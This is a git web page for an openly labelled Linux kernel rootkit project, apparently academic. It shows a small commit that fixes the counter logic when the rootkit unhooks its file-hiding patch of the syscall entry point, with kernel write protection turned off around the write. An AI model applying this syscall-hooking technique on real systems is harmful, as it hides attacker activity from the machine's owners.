linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs
commit 8e179427965a4d05e7d05bf306fa02ee857a3504
parent 05f785a35d79bb6035f712f2e5939845b8b9fdf6
Author: deurzen <m.deurzen@tum.de>
Date:   Mon, 11 Jan 2021 00:05:31 +0100

fix

Diffstat:

Msrc/filehide_lstar.c | 3++-


1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/src/filehide_lstar.c b/src/filehide_lstar.c
@@ -73,7 +73,8 @@ hide_files_lstar(void)
 void
 unhide_files_lstar(void)
 {
-    if (atomic_dec_return(&syscall64_install_count) < 1) {
+    if (atomic_read(&syscall64_install_count) == 1) {
+        atomic_dec(&syscall64_install_count);
         disable_protection();
         memcpy((syscall_64_ptr + 1), &old_off, 4);
         enable_protection();